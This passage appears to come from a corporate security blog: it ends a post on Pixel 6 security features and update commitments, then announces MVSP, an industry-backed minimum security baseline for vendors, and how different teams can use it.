Defense-in-depth isn’t just a matter of hardware and software layers. Security is a rigorous process. Pixel 6 and Pixel 6 Pro benefit from in-depth design and architecture reviews, memory-safe rewrites to security critical code, static analysis, formal verification of source code, fuzzing of critical components, and red-teaming, including with external security labs to pen-test our devices. Pixel is also part of the Android Vulnerability Rewards Program, which paid out $1.75 million last year, creating a valuable feedback loop between us and the security research community and, most importantly, helping us keep our users safe.

Capping off this combined hardware and software security system is the Titan Backup Architecture, which gives your Pixel a secure foot in the cloud. Launched in 2018, the combination of Android’s Backup Service and Google Cloud’s Titan Technology means that backed-up application data can only be decrypted by a randomly generated key that isn't known to anyone besides the client, including Google. This end-to-end service was independently audited by a third-party security lab to ensure no one can access a user's backed-up application data without specifically knowing their passcode.

To top it all off, this end-to-end security from the hardware across the software to the data center comes with no fewer than 5 years of guaranteed Android security updates on Pixel 6 and Pixel 6 Pro devices from the date they launch in the US. This is an important commitment for the industry, and we hope that other smartphone manufacturers broaden this trend.

Together, our secure chipset, software and processes make Pixel 6 and Pixel 6 Pro the most secure Pixel phone yet.

Launching a collaborative minimum security baseline


According to an Opus and Ponemon Institute study, 59% of companies have experienced a data breach caused by one of their vendors or third parties. Outsourcing operations to third-party vendors has become a popular business strategy as it allows organizations to save money and increase operational efficiency. While these are positives for business operations, they do create significant security risks. These vendors have access to critical systems and customer data, so their security posture becomes equally important.

Up until today, organizations of all sizes have had to design and implement their own security baselines for vendors that align with their risk posture. Unfortunately, this creates an impossible situation for vendors and organizations alike as they try to accommodate thousands of different requirements.

To solve this challenge, organizations across the industry teamed up to design Minimum Viable Secure Product or MVSP – a vendor-neutral security baseline that is designed to eliminate overhead, complexity and confusion during the procurement, RFP and vendor security assessment process by establishing minimum acceptable security baselines. With MVSP, the industry can increase clarity during each phase so parties on both sides of the equation can achieve their goals, and reduce the onboarding and sales cycle by weeks or even months.

MVSP was developed and is backed by companies across the industry, including Google, Salesforce, Okta, Slack and more. Our goal is to increase the minimum bar for security across the industry while simplifying the vetting process.

MVSP is a collaborative baseline focused on developing a set of minimum security requirements for business-to-business software and business process outsourcing suppliers. Designed with simplicity in mind, it contains only those controls that must, at a minimum, be implemented to ensure a reasonable security posture. MVSP is presented in the form of a minimum baseline checklist that can be used to verify the security posture of a solution.

How can MVSP help you?





Security teams measuring vendor offerings against a set of minimum security baselines

MVSP ensures that vendor selection and RFP include a minimum baseline that is backed by the industry. Communicating minimum requirements up front ensures everyone understands where they stand and that the expectations are clear.

Internal teams looking to measure your security against minimum requirements

MVSP provides a set of minimum security baselines that can be used as a checklist to understand gaps in the security of a product or service. This can be used to highlight opportunities for improvement and raise their visibility within the organization, with clearly defined benefits.


Procurement teams gathering information about vendor services

MVSP provides a single set of security-relevant questions that are publicly available and industry-backed. Aligning on a single set of baselines allows clearer understanding from vendors, resulting in a quicker and more accurate response.

Legal teams negotiating contractual controls

MVSP ensures expectations regarding minimum security controls are understood up front, reducing discussions of controls at the contract negotiation stage. Referencing an external baseline helps to simplify contract language and increases familiarity with the requirements.

Compliance teams documenting processes

MVSP provides an externally recognized and adopted set of security baselines on top of which to build your compliance efforts.

We welcome community feedback and interest from other organizations who want to contribute to the MVSP baseline. Together we can raise the minimum bar for security across the industry and make everyone safer.

Acknowledgements

The work in this post is the result of a collaboration between a large number of security practitioners across the industry including: Marat Vyshegorodtsev, Chris John Riley, Gabor Acs-Kurucz, Sebastian Oglaza, Gen Buckley, and Kevin Clark.